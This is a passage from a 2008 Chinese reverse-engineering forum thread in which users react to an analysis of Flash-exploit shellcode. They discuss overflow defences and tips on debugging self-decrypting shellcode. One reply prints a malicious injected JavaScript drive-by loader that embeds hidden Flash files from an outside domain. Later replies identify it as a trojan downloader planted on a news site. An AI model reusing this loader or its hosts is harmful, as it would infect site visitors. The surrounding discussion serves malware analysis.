首页
社区
课程
招聘
[原创]flash漏洞所用shellcode的分析
发表于: 2008-6-2 19:29 829950

[原创]flash漏洞所用shellcode的分析

2008-6-2 19:29
829950
收藏
免费 7
支持
分享
最新回复 (83)
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
26
占楼向晓聪学习
2008-6-3 15:17
0
雪    币: 339
活跃值: (1510)
能力值: ( LV13,RANK:970 )
在线值:
发帖
回帖
粉丝
27
o,酱紫r,学习了。
2008-6-3 19:08
0
雪    币: 206
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
28
楼主太厉害了,膜拜。。。
2008-6-3 20:31
0
雪    币: 2575
活跃值: (502)
能力值: ( LV2,RANK:85 )
在线值:
发帖
回帖
粉丝
29
  恐怖
2008-6-3 21:02
0
雪    币: 215
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
30
膜拜一下
2008-6-3 21:12
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
31
顶,果然都是漏洞利用专家
2008-6-3 22:29
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
32
能绕过comodo的内存防火墙吗?
这东西那天看到的时候吓我一跳,啥时候这东西竟然做成了防火墙了
2008-6-3 22:30
0
雪    币: 381
活跃值: (140)
能力值: ( LV13,RANK:330 )
在线值:
发帖
回帖
粉丝
33
学习,还久没玩shellcode了,感觉有些陌生了
2008-6-4 08:08
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
34
防止堆栈溢出攻击这种技术应该不可能是VM技术
有几种比较不错的技术
1.  使用内存页边界检测和访问权限技术(这种技术比较容易实现,且操作系统的通用性好)
2.  使用Ldr堆地址重定位技术,这种技术实现起来和操作系统密切相关,哪怕一个补丁也可能引发BOSD危险,这种技术在网上能找到文档
3.  esp,eip执行断点检测技术,这种技术我不是很清楚
2008-6-4 08:34
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
35
当有人在研究如何利用漏洞执行shellcode散播病毒的时候,大部分人都爱上了shellcode的研究
而在这个时候有人却在研究如何能防止shellcode的漏洞利用
我试问各位安全界的高手,你们属于哪一种人?
是沉迷于shellcode的人呢,还是真正做安全的人

看到一个这样的签名

网络本来很安全,但当有了安全人员出现以后网络就变得很不安全了
2008-6-4 11:03
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
36
你用什么样的exe进行OD调试阿?将开头粘贴后,到xor 那一步,则无法进行下去,f4也不行?
2008-6-4 23:41
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
37
希望大虾们进行回答
2008-6-4 23:42
0
雪    币: 722
活跃值: (123)
能力值: ( LV12,RANK:300 )
在线值:
发帖
回帖
粉丝
38
植入的exe那个区段属性必须是RWE,即可读可写可执行(shellcode用xor解密自身的代码,所以区段必须可写,否则会发生0xC0000005内存访问错误),可直接用LordPE修改该区段属性达到目的。
2008-6-5 00:18
0
雪    币: 202
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
39
好强悍。。。收下。。研究之
2008-6-5 11:16
0
雪    币: 288
活跃值: (53)
能力值: ( LV8,RANK:120 )
在线值:
发帖
回帖
粉丝
40
写的这么多字,很详细嘛。
居然还加高亮显示?你很强啊(时间真多),呵呵!
过来帮你顶下!
2008-6-5 21:04
0
雪    币: 122
活跃值: (68)
能力值: ( LV6,RANK:90 )
在线值:
发帖
回帖
粉丝
41
看起来不错,现在忙啊,等有时间学习学习。。。
2008-6-5 21:15
0
雪    币: 202
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
42
很好的文章
收藏了慢慢看
2008-6-5 21:47
0
雪    币: 201
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
43
你很强大,我很佩服
2008-6-6 10:48
0
雪    币: 556
活跃值: (2303)
能力值: ( LV9,RANK:2130 )
在线值:
发帖
回帖
粉丝
44
怎么这么多病毒抄那个模块呀.......
2008-6-6 11:30
0
雪    币: 210
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
45
window.onerror=function(){return true;}
function init(){window.status="";}window.onload = init;
if(document.cookie.indexOf("play=")==-1){
var expires=new Date();
expires.setTime(expires.getTime()+24*60*60*1000);
document.cookie="play=Yes;path=/;expires="+expires.toGMTString();
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=4,0,19,0" width="0" height="0" align="middle">');
document.write('<param name="allowScriptAccess" value="sameDomain"/>');
document.write('<param name="movie" value="http://mmlan.com.cn/4561.swf"/>');
document.write('<param name="quality" value="high"/>');
document.write('<param name="bgcolor" value="#ffffff"/>');
document.write('<embed src="http://mmlan.com.cn/ie.swf"/>');
document.write('</object>');
}else
{document.write("<EMBED src=http://mmlan.com.cn/4562.swf width=0 height=0>");}}
2008-6-6 19:40
0
雪    币: 2870
活跃值: (2335)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
46
楼上当中的一些代码会下载“机器狗”!!!请大家小心。
http://mmlan.com.cn/4561.swf
http://mmlan.com.cn/ie.swf
我下载后打开,就中了……
目前只找到感染explorer.exe及时关了很多下载。(会自动下载很多……,抓到有好多,当中的11111.exe壳搞不定……)
2008-6-7 14:54
0
雪    币: 210
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
47
  晕,你用ie打开干啥啊
用wget

这个是cnBeta.com上面挂的马
里边的驱动,挺有意思,还骂了金山,呵呵
2008-6-7 22:14
0
雪    币: 215
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
48
又系漏洞,怕怕,学习学习
2008-6-11 10:35
0
雪    币: 200
活跃值: (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
49
学习....很强悍
2008-6-13 15:54
0
雪    币: 195
活跃值: (62)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
50
学习。谢谢分享
2008-6-13 18:39
0
游客
登录 | 注册 方可回帖
返回
//